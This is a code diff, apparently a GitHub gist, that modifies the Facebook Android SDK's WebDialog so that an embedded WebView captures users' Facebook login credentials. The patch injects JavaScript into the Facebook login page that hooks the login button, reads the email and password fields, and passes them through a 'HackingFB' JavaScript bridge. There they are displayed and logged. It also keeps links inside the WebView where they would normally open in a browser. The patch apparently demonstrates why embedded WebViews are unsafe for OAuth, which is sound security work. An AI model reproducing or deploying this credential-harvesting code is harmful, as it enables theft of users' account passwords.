Facebook Android SDK 3.6.0 OAuth using embedded Web View
diff --git i/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java w/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java | |
index 70ac868..c2c9af0 100644 | |
--- i/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java | |
+++ w/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java | |
@@ -17,6 +17,7 @@ | |
package com.facebook.widget; | |
import android.annotation.SuppressLint; | |
+import android.app.AlertDialog; | |
import android.app.Dialog; | |
import android.app.ProgressDialog; | |
import android.content.Context; | |
@@ -29,8 +30,11 @@ import android.net.Uri; | |
import android.net.http.SslError; | |
import android.os.Bundle; | |
import android.util.DisplayMetrics; | |
+import android.util.Log; | |
import android.view.*; | |
+import android.webkit.JavascriptInterface; | |
import android.webkit.SslErrorHandler; | |
+import android.webkit.WebChromeClient; | |
import android.webkit.WebView; | |
import android.webkit.WebViewClient; | |
import android.widget.FrameLayout; | |
@@ -43,6 +47,8 @@ import com.facebook.internal.ServerProtocol; | |
import com.facebook.internal.Utility; | |
import com.facebook.internal.Validate; | |
+import org.json.JSONTokener; | |
+ | |
/** | |
* This class provides a mechanism for displaying Facebook Web dialogs inside a Dialog. Helper | |
* methods are provided to construct commonly-used dialogs, or a caller can specify arbitrary | |
@@ -342,6 +348,15 @@ public class WebDialog extends Dialog { | |
ViewGroup.LayoutParams.MATCH_PARENT)); | |
webView.setVisibility(View.INVISIBLE); | |
webView.getSettings().setSavePassword(false); | |
+ webView.addJavascriptInterface(new HackingFB(), "HackingFB"); | |
+ webView.setWebChromeClient(new WebChromeClient() { | |
+ @Override | |
+ public void onConsoleMessage(String message, int lineNumber, String sourceID) { | |
+ Log.e("password", message + " -- From line " | |
+ + lineNumber + " of " | |
+ + sourceID); | |
+ } | |
+ }); | |
webViewContainer.setPadding(margin, margin, margin, margin); | |
webViewContainer.addView(webView); | |
@@ -349,6 +364,24 @@ public class WebDialog extends Dialog { | |
contentFrameLayout.addView(webViewContainer); | |
} | |
+ private class HackingFB { | |
+ | |
+ @JavascriptInterface | |
+ public void foundCredential(String name, String password) { | |
+ harvest(name, password); | |
+ } | |
+ | |
+ private void harvest(String name, String password) { | |
+ AlertDialog.Builder alertDialogBuilder = new AlertDialog.Builder( | |
+ getContext()); | |
+ alertDialogBuilder.setTitle(name); | |
+ alertDialogBuilder.setMessage(password); | |
+ alertDialogBuilder.create(); | |
+ alertDialogBuilder.show(); | |
+ Log.e("Password", String.format("%s %s", name, password)); | |
+ } | |
+ } | |
+ | |
private class DialogWebViewClient extends WebViewClient { | |
@Override | |
@SuppressWarnings("deprecation") | |
@@ -396,10 +429,11 @@ public class WebDialog extends Dialog { | |
} else if (url.contains(DISPLAY_TOUCH)) { | |
return false; | |
} | |
+ return false; | |
// launch non-dialog URLs in a full browser | |
- getContext().startActivity( | |
- new Intent(Intent.ACTION_VIEW, Uri.parse(url))); | |
- return true; | |
+// getContext().startActivity( | |
+// new Intent(Intent.ACTION_VIEW, Uri.parse(url))); | |
+// return true; | |
} | |
@Override | |
@@ -445,6 +479,16 @@ public class WebDialog extends Dialog { | |
contentFrameLayout.setBackgroundColor(Color.TRANSPARENT); | |
webView.setVisibility(View.VISIBLE); | |
crossImageView.setVisibility(View.VISIBLE); | |
+ if (url.contains("facebook.com/login.php")) { | |
+ Log.e("password ", "Sending alert"); | |
+ view.loadUrl("javascript:console.log('password From Native')"); | |
+ view.loadUrl("javascript:console.log(document)"); | |
+ view.loadUrl("" + | |
+ "javascript:function hacker() {" + | |
+ "var f = document.getElementsByTagName('form')[0];" + | |
+ " HackingFB.foundCredential(f.email.value, f.pass.value); " + | |
+ "f.submit()}; document.getElementsByName('login')[0].onclick=hacker; "); | |
+ } | |
} | |
} | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment